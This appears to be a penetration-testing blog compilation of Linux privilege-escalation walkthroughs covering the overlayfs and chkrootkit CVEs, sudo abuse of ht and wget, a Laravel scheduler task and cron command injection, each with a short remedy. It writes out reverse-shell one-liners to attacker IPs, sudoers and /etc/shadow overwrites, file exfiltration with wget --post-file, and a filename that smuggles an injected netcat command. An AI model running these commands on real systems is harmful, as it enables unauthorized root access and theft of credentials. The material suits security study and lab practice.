‘overlayfs’ Local Privilege Escalation – CVE-2015-1328

The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace. (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1328)

Ubuntu could allow a local attacker to gain elevated privileges on the system, caused by incorrect permission checks when creating new files in the upper filesystem directory by the overlayfs filesystem. An attacker could exploit this vulnerability to gain root privileges on the system. Note: This vulnerability also affects Cloud Foundry. (https://exchange.xforce.ibmcloud.com/vulnerabilities/103882)

Affected releases

  • (Ubuntu 14.04/15.10)
  • Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04

Affected kernel

  • Linux Kernel 4.3.3
  • Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)

For more info

https://seclists.org/oss-sec/2015/q2/717

https://www.securityfocus.com/bid/75206/info

https://www.exploit-db.com/exploits/37293

Identification

1. We should already have access to the machine, since, this is a post-exploitation activity, and the attack is done locally. First thing we need to do is identify the kernel version

  • lsb_release -a

2. check the kernel version

  • uname -a

Note: It was identified at the 4.3.3 version. So, we are on good track with 3.13.0, older version.

3. To make sure this is vulnerable, let’s run a script that detects possible vulnerabilities. linux-exploit suggester (see how to use https://vk9-sec.com/linux-exploit-suggester-enumeration-linux-kernellinux-based-machine/)

Source code (https://github.com/mzet-/linux-exploit-suggester)

  • cd /tmp
  • wget http://192.168.0.13:9999/linux-exploit-suggester.sh
  • chmod 777 linux-exploit-suggester.sh
  • ./linux-exploit-suggester.sh

Note: Highly vulnerable, means this is likely to have success.

Execution

1. Download the exploit to your Kali/Parrot machine, and share it by any means with the remote server. I’d use a python web server

  • wget https://www.exploit-db.com/download/37292
  • mv 37292 exploit.c
  • ls -l exploit.c
  • python3.9 -m http.server 9999

2. In the remote server access the Kali web server, and download the script in /tmp

  • wget http://192.168.0.13:9999/exploit.c

3. Proceed to compile, and, execute the script

  • gcc exploit.c -o exploit
  • ./exploit
  • whoami
  • hostname

Remedy

Apply the patch for this vulnerability, available from the Ubuntu GIT Repository.

For Cloud Foundry Elastic Runtime:

Upgrade to the latest version (1.4.5 or later), available from the Pivotal Web site.

 

Chkrootkit 0.49 – Local Privilege Escalation – CVE-2014-0476

chkrootkit is a tool to locally check for signs of a rootkit (http://www.chkrootkit.org/). It contains:

  • chkrootkit: a shell script that checks system binaries for rootkit modification.
  • ifpromisc.c: checks if the network interface is in promiscuous mode.
  • chklastlog.c: checks for lastlog deletions.
  • chkwtmp.c: checks for wtmp deletions.
  • check_wtmpx.c: checks for wtmpx deletions. (Solaris only)
  • chkproc.c: checks for signs of LKM trojans.
  • chkdirs.c: checks for signs of LKM trojans.
  • strings.c: quick and dirty strings replacement.
  • chkutmp.c: checks for utmp deletions.

We will exploit a vulnerability in the chkrootkit package, which may allow local attackers to gain root access to a box in certain configurations (/tmp not mounted noexec).

The vulnerability is located in the function slapper() in the shellscript chkrootkit (https://www.exploit-db.com/exploits/33899)

Resources

https://nvd.nist.gov/vuln/detail/CVE-2014-0476

https://exchange.xforce.ibmcloud.com/vulnerabilities/93603

To check the version of the program you can access /usr/sbin/chkrootkit

  • apt-cache policy chkrootkit
  • chkrootkit
  • whereis chkrootkit
  • head /usr/sbin/chkrootkit

Exploitation

1. First step to exploit this vulnerability, we need to create a file named ‘update’ in /tmp directory, with a bash command, and, make the file executable

  • echo 'mkdir /tmp/vry4n' > /tmp/update
  • chmod 777 /tmp/update

2. Now execute the chkrootkit command using root. In this particular case, I found a cron job running it as root, I had to wait for it to execute automatically, after a while I found the new directory named ‘vry4n’, the owner is root

  • ls -l /tmp

 

3. Knowing the previous command executed, we can modify files, we can add privileges to our current user www-data by modifying /etc/sudoers

  • echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
  • cat update
  • ls -l

4. Again I’d wait for the cron job to execute as root, then log in as root using ‘sudo su’

  • sudo su
  • whoami

OPTIONAL (Run a reverse shell)

1. First on the attacking machine we need to start a listener

  • nc -lvp 4444

2. On the server you can add the following line to the update file in /tmp

  • echo ‘bash -i >& /dev/tcp/192.168.0.13/4444 0>&1’ > /tmp/update
  • echo ‘nc -e /bin/sh 192.168.0.13 4444’ > /tmp/update

3. When the communication gets the listener, it would be requested by the root user

Exploiting with Metasploit

1. Having a meterpreter session already we can use unix/local/chkrootkit to exploit this vulnerability. First we will background the current session

  • background

2. Now, we will select the module, fill the required options and wait for the connection back

use unix/local/chkrootkit

  • show options
  • sessions -i
  • set session 1
  • set LPORT 443
  • set LHOST 192.168.0.13

3. Run the module, and, wait for the cron job to execute

  • exploit
  • whoami

Remedy

Upgrade to the latest version of chkrootkit (0.50 or later), available from the chkrootkit Web site.

 

HT – privilege escalation

HT is a file editor/viewer/analyzer for executables. The goal is to combine the low-level functionality of a debugger and the usability of IDEs. We plan to implement all (hex-)editing features and support of the most important file formats.

Exploit

1. Check what sudo permission the current user has, desired “NOPASSWD”

  • sudo -l

 

Note: Here we can see this user has free root execution without password, another way could improper handling of file permissions, such as sticky bits.

2. Run the application

  • sudo ht

3. Since this program has been run, with sudo privileges, we can now open and edit any file in the system, we will open “/etc/sudoers” to grant additional access to our user

  • Press F3 to open a file
  • locate the file

4. Edit the file and add the permissions you need. IN this case I would add “/bin/bash” to run without password.

  • loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash

5. Save the work, and exit the editor

  • F2 for save
  • F10 to quit

6. Now use bash with sudo privileges

  • sudo /bin/bash

Remedy

Watch out what permissions you grant, and to whom it is granted.

 

wget – Privilege Escalation

wget is a free utility for non-interactive download of files from the Web. It supports HTTP, HTTPS, and FTP protocols, as well as retrieval through HTTP proxies.

If you get access to use with root privileges it can be harmful.

  • sudo -l

Hacking steps

1. wget has the capability of reading local files and sending content over the network, having a netcat listener que can get the contents of sensitive files

Local machine

  • nc -lvp 80

Remote machine

  • sudo /usr/bin/wget --post-file=/etc/passwd 10.10.14.21

Running that command prints the file content to our netcat

2. Doing this trick with /etc/shadow can help us view the password hash. We can try to overwrite that.

We save the contents of the output in a file named shadow in the local machine

  • vi shadow
  • cat shadow

3. I will update the root line with the exiting hash of a known user sammy (which I already know the password), if you get to create a compatible hash you can use that one for this technique too.

root:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:14146::::::

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

4. Now download the file and write the output to /etc/shadow

Local machine

  • python -m SimpleHTTPServer 9999

Remote machine

-O = write output, as we have root privileges it will do

  • sudo wget 10.10.14.21:9999/shadow -O /etc/shadow

5. Read the /etc/shadow file in the remote machine and make sure it has been overwritten

Local machine

  • nc -lvp 80

Remote machine

  • sudo /usr/bin/wget --post-file=/etc/passwd 10.10.14.21

Output in netcat

The file has been updated. The root hash shows differently as it was at the beginning

6. Try elevating privileges

  • su -
  • password: cooldude!

 

laravel – schedule task – crontab

Laravel is a web application framework with expressive, elegant syntax.

https://www.easylaravelbook.com/blog/introducing-the-laravel-5-command-scheduler/

https://laravel.com/docs/5.8/scheduling#scheduling-artisan-commands

The Laravel command scheduler allows you to manage your task execution dates and times using easily understandable PHP syntax. You'll manage the task execution definitions in app/Console/Kernel.php

Scheduling Your Command

As was perhaps made obvious by the earlier example, scheduling your command within app/Console/Kernel.php is easy. If you'd like amazon:update to run hourly, you'll use the hourly method

Updating Amazon product information hourly seems a bit aggressive. Fortunately, you have plenty of other options. To run a command on a daily basis (midnight), use daily:

To run it at a specific time, use the dailyAt method:

If you need to run a command very frequently, you can use an every method:

Enabling the Scheduler

With your tasks created and scheduled, you'll need to add a single entry to your server's crontab file:

Execute terminal commands

You can optionally define some logic for execution directly within the schedule method:

Schedule Frequency

Execution

1. I noticed in crontab that there is a task for laravel

2. I modified the file Kernel.php located in app/Console

3. I ran a reverse shell, without & at the end the communication closes. Make sure to use it like that to run in background.

4. Having already a listener in place wait for communication as the Kernel.php is executed every minute

Using crontab and command injection privilege escalation

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.

https://owasp.org/www-community/attacks/Command_Injection

The cron daemon is a long-running process that executes commands at specific dates and times. For commands that need to be executed repeatedly (e.g., hourly, daily, or weekly), you can use the crontab

Each entry in a crontab file consists of six fields

  • minute(s) hour(s) day(s) month(s) weekday(s) command(s)

Field Value Description

minute 0-59 The exact minute that the command sequence executes

hour 0-23 The hour of the day that the command sequence executes

day 1-31 The day of the month that the command sequence executes

month 1-12 The month of the year that the command sequence executes

weekday 0-6 The day of the week that the command sequence executes (Sunday = 0, etc.)

In this example we have a PHP script that is executed by crontab every 3 minutes

What the PHP script does is check files within a directory, scans that most files have a specific format, if there is any anomaly delete some files.

Code analysis

1. This first block of code does the following.

  • Requires lib.php to run
  • Set the variable $path to set the directory to scan
  • Logs will be written to $logpath variable which is /tmp/attack.log

It then set an empty array as $files, does some regular expression on the result of a “scandir()” function that works as Linux “ls”

2. This second block, with the results, for each result in $files, set a key and a value, if the file index.html is detected just ignore it.

3. In this piece of code, we call the function “getnameCheck” that is in lib.php file, if the result of $check is not valid, use the function “file_put_contents” to write a file and the execute some system commands.

lib.php

check_attack.php

We can now try to exploit this code.

Exploitation

1. Now that we know this scripts executes BASH commands when a file doesn’t pass the check. We will create a suspicious file that executes a reverse shell.

  • touch -- ‘; nc -c bash 10.10.14.37 4444;.php’
  • ls -l

2. Start the listener on Kali/Parrot using netcat

  • nc -lvp 4444

3. Wait for the script to execute and check netcat

Remedy

1. Avoid using PHP system exec functions, and, try to replace them with functions that are PHP embedded

  • use “scandir()” instead of exec(“ls”)

2. Sanitize all user input

  • Block the use of “;”, “&&”, “|” as an example